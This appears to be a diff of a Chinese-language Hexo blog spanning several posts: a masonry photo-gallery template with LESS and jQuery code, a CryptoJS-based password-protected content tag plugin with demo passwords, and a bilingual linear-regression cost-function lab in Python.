                  print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

                  gallery.ejs

                  ​ 在 gallery.ejs 中调用这些变量:

                    @@ -535,21 +533,21 @@

                    gallery.ejs

                  • 设计了一个 description-container 用于存放图片的描述。
                  • <script>var lazyLoad = <%= theme.lazyload %></script><%- js('js/gallery.js') %> 貌似是个可行的 EJS 向 JS 传参的方法。
                  -
                  <%- partial('_partial/header',{name:'galleries'}) %>
                  <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
                  <%- js('js/masonry.pkgd.js') %>
                  <%- js('js/imagesloaded.pkgd.js') %>
                  <style> *{ box-sizing: border-box; } </style>

                  <div class="gallery-content">
                  <div class="grid">
                  <div class="grid-sizer"></div>
                  <% if (page.imgs && page.imgs.length > 0) { %>
                  <% page.imgs.forEach(function(item) { %>
                  <div class="grid-item">
                  <a href="<%- item.src %>"
                  title="<%- item.title %>"
                  data-src="<%- item.src %>"
                  class="fancybox"
                  data-fancybox="fancybox-gallery-img"
                  rel="article">
                  <img src="<%- item.src %>" alt="<%- item.title %>" />
                  </a>
                  </div>
                  <% }) %>
                  <% } %>
                  </div>
                  <div style="width: 100%; height: 20px;"></div>
                  <div class="description-container"><span></span></div>
                  <div style="width: 100%; height: 20px;"></div>
                  <div id="gitalk-container"></div>
                  </div>

                  <script>var lazyLoad = <%= theme.lazyload %></script>
                  <%- js('js/gallery.js') %>
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  <%- partial('_partial/header',{name:'galleries'}) %>
                  <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
                  <%- js('js/masonry.pkgd.js') %>
                  <%- js('js/imagesloaded.pkgd.js') %>
                  <style> *{ box-sizing: border-box; } </style>

                  <div class="gallery-content">
                  <div class="grid">
                  <div class="grid-sizer"></div>
                  <% if (page.imgs && page.imgs.length > 0) { %>
                  <% page.imgs.forEach(function(item) { %>
                  <div class="grid-item">
                  <a href="<%- item.src %>"
                  title="<%- item.title %>"
                  data-src="<%- item.src %>"
                  class="fancybox"
                  data-fancybox="fancybox-gallery-img"
                  rel="article">
                  <img src="<%- item.src %>" alt="<%- item.title %>" />
                  </a>
                  </div>
                  <% }) %>
                  <% } %>
                  </div>
                  <div style="width: 100%; height: 20px;"></div>
                  <div class="description-container"><span></span></div>
                  <div style="width: 100%; height: 20px;"></div>
                  <div id="gitalk-container"></div>
                  </div>

                  <script>var lazyLoad = <%= theme.lazyload %></script>
                  <%- js('js/gallery.js') %>

                  gallery.less

                  ​ 同理,创建并编写对应的 galleriy.less 如下:

                  -
                  .gallery-content {
                  width: 100%;
                  padding: 2px 0;
                  max-width: 1200px;
                  margin: -64px auto auto auto;
                  border-radius: 10px;
                  background: #FFF;

                  .grid:after {
                  content: '';
                  display: block;
                  clear: both;
                  }

                  .grid-sizer,
                  .grid-item {
                  width: 33%;
                  }

                  .grid-item {
                  float: left;
                  padding: 10px;
                  }

                  .grid-item img {
                  display: block;
                  max-width: 100%;
                  border-radius: 10px;
                  }

                  .fancybox:hover {
                  z-index: 2;
                  transform: scale(1.1);
                  }

                  .description-container {
                  z-index: 2;
                  position: sticky;
                  width: 100%;
                  left: 0;
                  right: 0;
                  height: 40px;
                  bottom: 0;
                  background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
                  text-align: center;
                  flex-direction: column;
                  align-items: center;

                  span {
                  font-size: 18px;
                  color: #12183A;
                  text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
                  position: absolute;
                  bottom: 50%;
                  left: 50%;
                  transform: translate(-50%, 50%);
                  }
                  }

                  // 屏幕宽度较小时(如手机端),只显示一列
                  @media screen and (max-width: 660px) {
                  .grid-sizer,
                  .grid-item {
                  width: 100%;
                  }
                  }
                  }
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  33
                  34
                  35
                  36
                  37
                  38
                  39
                  40
                  41
                  42
                  43
                  44
                  45
                  46
                  47
                  48
                  49
                  50
                  51
                  52
                  53
                  54
                  55
                  56
                  57
                  58
                  59
                  60
                  61
                  62
                  63
                  64
                  65
                  66
                  67
                  .gallery-content {
                  width: 100%;
                  padding: 2px 0;
                  max-width: 1200px;
                  margin: -64px auto auto auto;
                  border-radius: 10px;
                  background: #FFF;

                  .grid:after {
                  content: '';
                  display: block;
                  clear: both;
                  }

                  .grid-sizer,
                  .grid-item {
                  width: 33%;
                  }

                  .grid-item {
                  float: left;
                  padding: 10px;
                  }

                  .grid-item img {
                  display: block;
                  max-width: 100%;
                  border-radius: 10px;
                  }

                  .fancybox:hover {
                  z-index: 2;
                  transform: scale(1.1);
                  }

                  .description-container {
                  z-index: 2;
                  position: sticky;
                  width: 100%;
                  left: 0;
                  right: 0;
                  height: 40px;
                  bottom: 0;
                  background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
                  text-align: center;
                  flex-direction: column;
                  align-items: center;

                  span {
                  font-size: 18px;
                  color: #12183A;
                  text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
                  position: absolute;
                  bottom: 50%;
                  left: 50%;
                  transform: translate(-50%, 50%);
                  }
                  }

                  // 屏幕宽度较小时(如手机端),只显示一列
                  @media screen and (max-width: 660px) {
                  .grid-sizer,
                  .grid-item {
                  width: 100%;
                  }
                  }
                  }

                  gallery.js

                  function initGallery()

                  ​ 因为设置了懒加载,在图片载入完毕的时候需要执行 $grid.masonry(); 以更新布局。

                  -
                  function initGallery()
                  {
                  var $grid = $('.grid').masonry({
                  itemSelector: '.grid-item',
                  percentPosition: true,
                  columnWidth: '.grid-sizer'
                  });
                  if(lazyLoad)
                  {
                  window.imageLazyLoadSetting = {
                  onImageLoaded: function() {
                  $grid.masonry();
                  }
                  };
                  }
                  else
                  {
                  // layout Masonry after each image loads
                  $grid.imagesLoaded().progress(function() {
                  $grid.masonry();
                  });
                  }
                  galleryBottom();
                  }

                  $(document).ready(function() {
                  initGallery();
                  });
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  function initGallery()
                  {
                  var $grid = $('.grid').masonry({
                  itemSelector: '.grid-item',
                  percentPosition: true,
                  columnWidth: '.grid-sizer'
                  });
                  if(lazyLoad)
                  {
                  window.imageLazyLoadSetting = {
                  onImageLoaded: function() {
                  $grid.masonry();
                  }
                  };
                  }
                  else
                  {
                  // layout Masonry after each image loads
                  $grid.imagesLoaded().progress(function() {
                  $grid.masonry();
                  });
                  }
                  galleryBottom();
                  }

                  $(document).ready(function() {
                  initGallery();
                  });

                  function galleryBottom()

                  ​ Javascript 代码如下:

                  • 对于移动端,获取当前屏幕中间的图片 title,显示到底边栏中。
                  • 对于电脑端,当鼠标移动到某张图片上时,将对应的 title 显示到底边栏中。
                  -
                  function galleryBottom(){
                  if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
                  {
                  var descriptionContainer = document.querySelector('.description-container span');
                  document.addEventListener("scroll", function () {
                  var title = getBottomTitle();
                  descriptionContainer.textContent = title;
                  }, 3000);
                  }
                  else {
                  var galleryContent = document.querySelector('.grid');
                  var descriptionContainer = document.querySelector('.description-container span');

                  galleryContent.addEventListener('mouseover', function(event) {
                  if (event.target.tagName.toLowerCase() === 'img') {
                  var title = event.target.getAttribute('alt');
                  descriptionContainer.textContent = title;
                  }
                  });

                  galleryContent.addEventListener('mouseout', function(event) {
                  if (event.target.tagName.toLowerCase() === 'img') {
                  descriptionContainer.textContent = '';
                  }
                  });
                  }

                  function getBottomTitle() {
                  var elements = document.querySelectorAll('.fancybox');
                  var viewportHeight = window.innerHeight;
                  var bottomElement = null;
                  for (var i = 0; i < elements.length; i++) {
                  var rect = elements[i].getBoundingClientRect();

                  if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
                  bottomElement = {
                  element: elements[i],
                  rect: rect
                  }
                  }
                  }
                  if (bottomElement) {
                  return bottomElement.element.title;
                  }
                  }
                  }
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  33
                  34
                  35
                  36
                  37
                  38
                  39
                  40
                  41
                  42
                  43
                  44
                  45
                  46
                  function galleryBottom(){
                  if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
                  {
                  var descriptionContainer = document.querySelector('.description-container span');
                  document.addEventListener("scroll", function () {
                  var title = getBottomTitle();
                  descriptionContainer.textContent = title;
                  }, 3000);
                  }
                  else {
                  var galleryContent = document.querySelector('.grid');
                  var descriptionContainer = document.querySelector('.description-container span');

                  galleryContent.addEventListener('mouseover', function(event) {
                  if (event.target.tagName.toLowerCase() === 'img') {
                  var title = event.target.getAttribute('alt');
                  descriptionContainer.textContent = title;
                  }
                  });

                  galleryContent.addEventListener('mouseout', function(event) {
                  if (event.target.tagName.toLowerCase() === 'img') {
                  descriptionContainer.textContent = '';
                  }
                  });
                  }

                  function getBottomTitle() {
                  var elements = document.querySelectorAll('.fancybox');
                  var viewportHeight = window.innerHeight;
                  var bottomElement = null;
                  for (var i = 0; i < elements.length; i++) {
                  var rect = elements[i].getBoundingClientRect();

                  if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
                  bottomElement = {
                  element: elements[i],
                  rect: rect
                  }
                  }
                  }
                  if (bottomElement) {
                  return bottomElement.element.title;
                  }
                  }
                  }

                  演示

                  ​ 大功告成,瀑布流相册的演示:

                  每次输出的公钥还不唯一……

                  ​ 使用 AES 解密:

                  -
                  CryptoJS.AES.decrypt(公钥, 私钥).toString(CryptoJS.enc.Utf8));
                  +
                  1
                  CryptoJS.AES.decrypt(公钥, 私钥).toString(CryptoJS.enc.Utf8));

                  ​ 如果公钥和私钥正确,将会正确返回内容,如果错误则返回空。

                  ​ 有时候解密时会出现 Error: Malformed UTF-8 data 错误导致解密失败,参考一下 javascript - Why I get Malformed UTF-8 data error on crypto-js? - Stack Overflow……我也不知道具体啥情况,多检查几遍代码看看哪里有错吧……


                  ​ 好的,现在我们正确掌握了内容、公钥和私钥之间的转换逻辑。如果内容的字符串是一段 HTML 代码,则我们可以将其渲染出来

                  ​ 基于此,我们可以使用 JQuery 定义一个 AESContainer 类以实现我们的文章加密插件:

                  -
                  class AESContainer {
                  constructor(label, pubkey) {
                  this.pubkey = pubkey;
                  this.container = $('<div>').addClass('AES-container');
                  this.inputContainer = $('<div>').addClass('AES-input');
                  this.inputField = $('<input>').attr({type: 'password', required: true});
                  this.highlight = $('<span>').addClass('hl');
                  this.bar = $('<span>').addClass('bar');
                  this.label = $('<label>').text(label);

                  this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
                  this.container.append(this.inputContainer);

                  this.inputField.on('keypress', this.handleKeyPress.bind(this));
                  }

                  handleKeyPress(event) {
                  if (event.key === 'Enter') {
                  this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
                  if (this.decrypted) {
                  this.inputContainer.remove();
                  this.container.append($(this.decrypted));
                  }
                  }
                  }

                  render() {
                  $(document.currentScript).before(this.container);
                  }
                  }
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  class AESContainer {
                  constructor(label, pubkey) {
                  this.pubkey = pubkey;
                  this.container = $('<div>').addClass('AES-container');
                  this.inputContainer = $('<div>').addClass('AES-input');
                  this.inputField = $('<input>').attr({type: 'password', required: true});
                  this.highlight = $('<span>').addClass('hl');
                  this.bar = $('<span>').addClass('bar');
                  this.label = $('<label>').text(label);

                  this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
                  this.container.append(this.inputContainer);

                  this.inputField.on('keypress', this.handleKeyPress.bind(this));
                  }

                  handleKeyPress(event) {
                  if (event.key === 'Enter') {
                  this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
                  if (this.decrypted) {
                  this.inputContainer.remove();
                  this.container.append($(this.decrypted));
                  }
                  }
                  }

                  render() {
                  $(document.currentScript).before(this.container);
                  }
                  }

                  ​ 再设计偷一个好看的 CSS:

                  -
                  .AES-container {
                  border: 2px solid var(--border);
                  margin: 10px auto;
                  padding: 10px 20px;
                  width: 100%;
                  box-sizing: border-box;
                  transition: border 0.5s ease-in-out;
                  }

                  /* form starting stylings ------------------------------- */
                  .AES-container .AES-input {
                  position: relative;
                  margin: 20px 0 10px;
                  box-sizing: border-box;
                  }

                  .AES-input input {
                  font-size: 16px;
                  padding: 5px 2px;
                  display: block;
                  width: calc(100% - 4px);
                  border: none;
                  border-bottom: 2px solid var(--border);
                  background: none;
                  color: var(--text-primary);
                  transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
                  }

                  .AES-input input:focus {
                  outline: none;
                  }

                  /* LABEL ======================================= */
                  .AES-input label {
                  color: var(--text-secondary);
                  font-size: 16px;
                  font-weight: normal;
                  position: absolute;
                  pointer-events: none;
                  top: -5px;
                  transition: 0.2s ease all;
                  -moz-transition: 0.2s ease all;
                  -webkit-transition: 0.2s ease all;
                  }

                  /* active state */
                  .AES-input input:focus~label,
                  .AES-input input:valid~label {
                  top: -20px;
                  font-size: 14px;
                  color: var(--text-link);
                  }

                  /* BOTTOM BARS ================================= */
                  .AES-input .bar {
                  position: relative;
                  display: block;
                  width: 100%;
                  }

                  .AES-input .bar:before,
                  .AES-input .bar:after {
                  content: '';
                  height: 2px;
                  width: 0;
                  transform: translateY(-2px);
                  position: absolute;
                  background: var(--text-link);
                  transition: 0.2s ease all;
                  -moz-transition: 0.2s ease all;
                  -webkit-transition: 0.2s ease all;
                  }

                  .AES-input .bar:before {
                  left: 50%;
                  }

                  .AES-input .bar:after {
                  right: 50%;
                  }

                  /* active state */
                  .AES-input input:focus~.bar:before,
                  .AES-input input:focus~.bar:after {
                  width: 50%;
                  }

                  /* hlER ================================== */
                  .AES-input .hl {
                  position: absolute;
                  height: 60%;
                  width: 100px;
                  top: 25%;
                  left: 0;
                  pointer-events: none;
                  opacity: 0.5;
                  }

                  /* active state */
                  .AES-input input:focus~.hl {
                  -webkit-animation: inputhler 0.3s ease;
                  -moz-animation: inputhler 0.3s ease;
                  animation: inputhler 0.3s ease;
                  }

                  /* ANIMATIONS ================ */
                  @-webkit-keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }

                  @-moz-keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }

                  @keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  33
                  34
                  35
                  36
                  37
                  38
                  39
                  40
                  41
                  42
                  43
                  44
                  45
                  46
                  47
                  48
                  49
                  50
                  51
                  52
                  53
                  54
                  55
                  56
                  57
                  58
                  59
                  60
                  61
                  62
                  63
                  64
                  65
                  66
                  67
                  68
                  69
                  70
                  71
                  72
                  73
                  74
                  75
                  76
                  77
                  78
                  79
                  80
                  81
                  82
                  83
                  84
                  85
                  86
                  87
                  88
                  89
                  90
                  91
                  92
                  93
                  94
                  95
                  96
                  97
                  98
                  99
                  100
                  101
                  102
                  103
                  104
                  105
                  106
                  107
                  108
                  109
                  110
                  111
                  112
                  113
                  114
                  115
                  116
                  117
                  118
                  119
                  120
                  121
                  122
                  123
                  124
                  125
                  126
                  127
                  128
                  129
                  130
                  131
                  132
                  133
                  134
                  135
                  136
                  137
                  138
                  .AES-container {
                  border: 2px solid var(--border);
                  margin: 10px auto;
                  padding: 10px 20px;
                  width: 100%;
                  box-sizing: border-box;
                  transition: border 0.5s ease-in-out;
                  }

                  /* form starting stylings ------------------------------- */
                  .AES-container .AES-input {
                  position: relative;
                  margin: 20px 0 10px;
                  box-sizing: border-box;
                  }

                  .AES-input input {
                  font-size: 16px;
                  padding: 5px 2px;
                  display: block;
                  width: calc(100% - 4px);
                  border: none;
                  border-bottom: 2px solid var(--border);
                  background: none;
                  color: var(--text-primary);
                  transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
                  }

                  .AES-input input:focus {
                  outline: none;
                  }

                  /* LABEL ======================================= */
                  .AES-input label {
                  color: var(--text-secondary);
                  font-size: 16px;
                  font-weight: normal;
                  position: absolute;
                  pointer-events: none;
                  top: -5px;
                  transition: 0.2s ease all;
                  -moz-transition: 0.2s ease all;
                  -webkit-transition: 0.2s ease all;
                  }

                  /* active state */
                  .AES-input input:focus~label,
                  .AES-input input:valid~label {
                  top: -20px;
                  font-size: 14px;
                  color: var(--text-link);
                  }

                  /* BOTTOM BARS ================================= */
                  .AES-input .bar {
                  position: relative;
                  display: block;
                  width: 100%;
                  }

                  .AES-input .bar:before,
                  .AES-input .bar:after {
                  content: '';
                  height: 2px;
                  width: 0;
                  transform: translateY(-2px);
                  position: absolute;
                  background: var(--text-link);
                  transition: 0.2s ease all;
                  -moz-transition: 0.2s ease all;
                  -webkit-transition: 0.2s ease all;
                  }

                  .AES-input .bar:before {
                  left: 50%;
                  }

                  .AES-input .bar:after {
                  right: 50%;
                  }

                  /* active state */
                  .AES-input input:focus~.bar:before,
                  .AES-input input:focus~.bar:after {
                  width: 50%;
                  }

                  /* hlER ================================== */
                  .AES-input .hl {
                  position: absolute;
                  height: 60%;
                  width: 100px;
                  top: 25%;
                  left: 0;
                  pointer-events: none;
                  opacity: 0.5;
                  }

                  /* active state */
                  .AES-input input:focus~.hl {
                  -webkit-animation: inputhler 0.3s ease;
                  -moz-animation: inputhler 0.3s ease;
                  animation: inputhler 0.3s ease;
                  }

                  /* ANIMATIONS ================ */
                  @-webkit-keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }

                  @-moz-keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }

                  @keyframes inputhler {
                  from {
                  background: var(--text-link);
                  }

                  to {
                  width: 0;
                  background: transparent;
                  }
                  }

                  ​ 如此做,使用如下语句:

                  -
                  <script>
                  new AESContainer('标签提示词', '公钥').render();
                  </script>
                  +
                  1
                  2
                  3
                  <script>
                  new AESContainer('标签提示词', '公钥').render();
                  </script>

                  ​ 即可在 <script> 前创建并渲染一个输入密码的提示框:

                  -
                  <div class="AES-container">
                  <div class="AES-input">
                  <input type="password" required="required">
                  <span class="hl"></span>
                  <span class="bar"></span>
                  <label>标签提示词</label>
                  </div>
                  </div>
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  <div class="AES-container">
                  <div class="AES-input">
                  <input type="password" required="required">
                  <span class="hl"></span>
                  <span class="bar"></span>
                  <label>标签提示词</label>
                  </div>
                  </div>

                  ​ 真是太棒了!现在我们需要后端帮我们自动生成公钥。

                  后端

                  ​ 借助 标签插件(Tag)| Hexo,在 Markdown 中如此写作:

                  -
                  {% AES '123','密码是"123"~' %}
                  Hello world!
                  {% endAES %}
                  +
                  1
                  2
                  3
                  {% AES '123','密码是"123"~' %}
                  Hello world!
                  {% endAES %}

                  ​ 经过 Hexo 渲染后转义为:

                  -
                  <script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>
                  +
                  1
                  <script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>

                  ​ 便大功告成!


                  ​ 在 Hexo 项目根目录下输入如下命令以安装 crypto-js

                  -
                  npm install crypto-js
                  +
                  1
                  npm install crypto-js

                  ​ 在 Hexo 项目下的 scripts 文件夹下新建文件 AES.js,里面写转义标签的逻辑:

                  -
                  'use strict'

                  var CryptoJS = require("crypto-js");

                  const parseArgs = args => {
                  return args.join(' ').split(',')
                  }

                  const AESFn = (args, content) => {
                  const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
                  content = hexo.render.renderSync({ text: content, engine: 'markdown' });
                  if (password == "") {
                  return content;
                  } else {
                  const pubkey = CryptoJS.AES.encrypt(content, password).toString();
                  const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
                  return result;
                  }
                  }

                  hexo.extend.tag.register('AES', AESFn, { ends: true })
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  'use strict'

                  var CryptoJS = require("crypto-js");

                  const parseArgs = args => {
                  return args.join(' ').split(',')
                  }

                  const AESFn = (args, content) => {
                  const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
                  content = hexo.render.renderSync({ text: content, engine: 'markdown' });
                  if (password == "") {
                  return content;
                  } else {
                  const pubkey = CryptoJS.AES.encrypt(content, password).toString();
                  const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
                  return result;
                  }
                  }

                  hexo.extend.tag.register('AES', AESFn, { ends: true })
                  • const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args) 获取参数,对于标签:

                    -
                    {% AES '123','密码是"123"~' %}
                    +
                    1
                    {% AES '123','密码是"123"~' %}
                    • password 为设定的密码 123
                    • label 为标签提示词 密码是"123"~,如果为空,则默认值:这里的内容需要输入密码才能查看~,注意逗号后不要有空格。
                    • @@ -518,13 +516,13 @@

                      后端

                      试一试

                      念桥边红药

                      ​ 在下面的框框中输入密码 promefire 即可产生 promefire 最喜欢的诗句!

                      -
                      {% AES 'promefire','密码是"promefire"~' %}
                      <marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
                      {% endAES %}
                      - +
                      1
                      2
                      3
                      {% AES 'promefire','密码是"promefire"~' %}
                      <marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
                      {% endAES %}
                      +

                      大故宫

                      ​ 在下面的框框中输入密码 12345678 即可欣赏大故宫!

                      -
                      {% AES '12345678','密码是"12345678"~' %}
                      ![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
                      <center>人去楼不空 往昔的叱咤化作春色满园</center>
                      {% endAES %}
                      +
                      1
                      2
                      3
                      4
                      {% AES '12345678','密码是"12345678"~' %}
                      ![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
                      <center>人去楼不空 往昔的叱咤化作春色满园</center>
                      {% endAES %}

                      ​ 请注意:解密后的显示的内容可能需要重新调用一下网页初始化的相关函数才能达到未加密的显示效果!

                      - +
                    -
                    def compute_cost(x, y, w, b): 
                    """
                    Computes the cost function for linear regression.
                    计算线性回归的成本函数。

                    Args:
                    x (ndarray (m,)): Data, m examples
                    y (ndarray (m,)): target values
                    w,b (scalar) : model parameters

                    Returns
                    total_cost (float): The cost of using w,b as the parameters for linear regression
                    to fit the data points in x and y
                    total_cost(float):使用 w,b 作为线性回归参数的成本
                    以拟合 x 和 y 中的数据点
                    """
                    # number of training examples
                    m = x.shape[0]

                    cost_sum = 0
                    for i in range(m):
                    f_wb = w * x[i] + b
                    cost = (f_wb - y[i]) ** 2
                    cost_sum = cost_sum + cost
                    total_cost = (1 / (2 * m)) * cost_sum

                    return total_cost
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    21
                    22
                    23
                    24
                    25
                    26
                    27
                    def compute_cost(x, y, w, b): 
                    """
                    Computes the cost function for linear regression.
                    计算线性回归的成本函数。

                    Args:
                    x (ndarray (m,)): Data, m examples
                    y (ndarray (m,)): target values
                    w,b (scalar) : model parameters

                    Returns
                    total_cost (float): The cost of using w,b as the parameters for linear regression
                    to fit the data points in x and y
                    total_cost(float):使用 w,b 作为线性回归参数的成本
                    以拟合 x 和 y 中的数据点
                    """
                    # number of training examples
                    m = x.shape[0]

                    cost_sum = 0
                    for i in range(m):
                    f_wb = w * x[i] + b
                    cost = (f_wb - y[i]) ** 2
                    cost_sum = cost_sum + cost
                    total_cost = (1 / (2 * m)) * cost_sum

                    return total_cost

                    Cost Function Intuition

                    png
                    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.

                    @@ -846,7 +844,7 @@

                    Cost

                    啥也出不来 orz

                    -
                    plt_intuition(x_train,y_train)
                    +
                    1
                    plt_intuition(x_train,y_train)
                    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…
                     

                    The plot contains a few points that are worth mentioning.

                    @@ -869,17 +867,17 @@

                    Larger Data Set

                    It’s use instructive to view a scenario with a few more data points. This data set includes data points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$, and $b$ that will give us a cost of 0?

                    使用具有更多数据点来查看方案具有指导意义。此数据集包括不在同一行上的数据点。这对成本等式意味着什么?我们能找到$w$,$b$,这将使我们的成本为 0 吗?

                    -
                    x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
                    y_train = np.array([250, 300, 480, 430, 630, 730,])
                    +
                    1
                    2
                    x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
                    y_train = np.array([250, 300, 480, 430, 630, 730,])

                    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.

                    在等值线图中,单击一个点以选择wb以实现最低成本。使用等值线来指导您的选择。请注意,更新图表可能需要几秒钟。

                    -
                    plt.close('all') 
                    fig, ax, dyn_items = plt_stationary(x_train, y_train)
                    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)
                    +
                    1
                    2
                    3
                    plt.close('all') 
                    fig, ax, dyn_items = plt_stationary(x_train, y_train)
                    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)

                    png

                    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.

                    在上面,请注意左侧图中的虚线。这些表示训练集中每个示例所贡献的成本部分。在这种情况下,大约$w=209$和$b=2.4$提供了低成本。请注意,由于我们的训练示例不在一条线上,因此最低成本不为零。

                    Convex Cost surface

                    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:

                    成本函数对损失进行平方的事实确保了“误差表面”像汤碗一样凸起。它将始终具有可以通过遵循所有维度的梯度来达到的最小值。在前面的图中,由于$w$和$b$的尺寸比例不同,所以不容易识别。以下图,其中$w$和$b$是对称的,在课程中显示:

                    -
                    soup_bowl()
                    +
                    1
                    soup_bowl()

                    png

                    Congratulations!

                    You have learned the following:

                    @@ -908,8 +906,8 @@

                    Tools

                  • Matplotlib, a popular library for plotting data
                  • plotting routines in the lab_utils.py file in the local directory
                  -
                  import math, copy
                  import numpy as np
                  import matplotlib.pyplot as plt
                  plt.style.use('./deeplearning.mplstyle')
                  from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
                  -
                  !ls -al
                  +
                  1
                  2
                  3
                  4
                  5
                  import math, copy
                  import numpy as np
                  import matplotlib.pyplot as plt
                  plt.style.use('./deeplearning.mplstyle')
                  from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
                  +
                  1
                  !ls -al
                  'ls' 不是内部或外部命令,也不是可运行的程序
                   或批处理文件。
                   
                  @@ -934,12 +932,12 @@

                  Problem Statement

                  -
                  # Load our data set
                  x_train = np.array([1.0, 2.0]) #features
                  y_train = np.array([300.0, 500.0]) #target value
                  +
                  1
                  2
                  3
                  # Load our data set
                  x_train = np.array([1.0, 2.0]) #features
                  y_train = np.array([300.0, 500.0]) #target value

                  Compute_Cost

                  This was developed in the last lab. We’ll need it again here.

                  这是在上一个实验中撰写的。我们在这里再次需要它。
